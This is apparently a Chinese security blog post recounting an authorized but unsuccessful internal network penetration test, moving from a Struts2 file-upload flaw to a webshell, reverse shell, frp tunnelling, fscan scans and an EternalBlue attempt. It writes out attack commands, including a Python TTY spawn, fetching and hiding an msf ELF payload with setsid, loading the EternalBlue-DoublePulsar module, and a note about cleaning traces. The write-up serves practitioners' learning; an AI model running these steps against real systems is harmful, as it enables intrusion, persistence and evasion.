一次不成功的内网渗透

admin 2022年11月20日00:08:18安全文章评论22 views1771字阅读5分54秒阅读模式

来自本群村サメマル的投稿 感觉很可以 大家一起学习下,注本次渗透都是在有授权的情况实现,切勿乱来

开局一张图 

一次不成功的内网渗透

测了下弱口令、扫了扫目录,正准备切换下一个的时候,漏扫返回结果,存在一个strust2 的文件上传和rce那就上传我的马子马子上传成功,顺便弹了一波shell,马子连的时间有点儿长,那就先弹到shell操作一波

进入内网

试试弱口令,在这儿,是属于标准输入输出,想得到一个交互的shell ,那就得有一个tty

python -c 'import pty;pty.1 spawn("/bin/sh")'

这样就是一个tty 终端了

一次不成功的内网渗透

常规的信息收集一波

一次不成功的内网渗透

这时候看了下,马子连接成功

一次不成功的内网渗透

顺便扫一下内网

一次不成功的内网渗透

卧槽,,这么多???先试着提权,msf生成elf马子,wget远程上传为了使命令行重复使用不浪费,这里可以直接后台运行

setsid ./.shell.elf &#或者nohup ./.shell.elf &#nohup会生成一个out输出文件,还得去擦屁股

multi/handle 上线msf挂起使用模块exploit_suggester

一次不成功的内网渗透

直接搭建frp 进入内网首先找到可操作的目录

find /home -name tomcat

进入有执行权限的目录,远程下载frpc 和文件frpc.ini,我真的是服了这个老六了,需要自己配置最大连接数,不然你用脚本扫直接给你扫宕,不对,不止是漏扫,就是burp访问也卡的鸭批

一次不成功的内网渗透

扫内网

一次不成功的内网渗透

好家伙,有ms17-010 ?直接上家伙,

一次不成功的内网渗透

设置路由就开始攻击好家伙, x86 的, msf 只有64bit 的,怎么能放弃呢?说不定能直接上线cs 呢,现在这个情况就是,代理一下流量直接打,那就添加一下路由,然后设置那个内网的ip

解决办法:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32#wine cmd.exe

然后下载x32 的包

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git && cd Eternalblue-Doublepulsar-Metasploit/ && cpeternalblue_doublepulsar.rb /opt/metasploitframework/embedded/framework/modules/exploits/windows/smb/

在msfconsole 这儿输入reload_all

现在使用这个模块:exploit/windows/smb/eternalblue_doublepulsar

设置一下set processinject explorer.exe

直接run

一次不成功的内网渗透

操!有防火墙

唧唧

扫了一下内网的所有端口,不得不说, fscan yyds

$ echo "./fscan -h 192.168.40.0/24 -p 1-65535 > res.txt && mv res.txt../docs" > start.sh$ chmod +x start.sh$ setsid ./start.sh &

喝点儿茶,过会儿去访问http://admin.xxx.xx/docs/res.txt

一次不成功的内网渗透

找到一个win sql server 的web界面登录

一次不成功的内网渗透

但是无法执行xp_cmdshell()
找到个提权点

好家伙,cve-2021-4034

一次不成功的内网渗透

嘿嘿猪队友实锤

一次不成功的内网渗透

快乐直接没了

后续还发现了内网一些服务 比如solr ,上传个自己写的脚本:

一次不成功的内网渗透

没洞


结算

第一次实战内网,虽然曲折坎坷,但是也学到了很多东西
搭建frp 经验+1
代理进入内网 经验+1
ssh 反向代理 经验+1
提权 经验+1
权限维持手法 经验+1
熟练度+1
阅历+1
别手贱(白发如雪说 哈哈哈)

     再来句 要加群的公众号直接回复加群,大家一起进来吹牛聊天交朋友。群画风有点怪 希望大家别介意。

特别声明:

       由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

        作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考

我不会渗透,我们下次再见! 



原文始发于微信公众号(深夜笔记本):一次不成功的内网渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月20日00:08:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一次不成功的内网渗透 http://cn-sec.com/archives/1418899.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: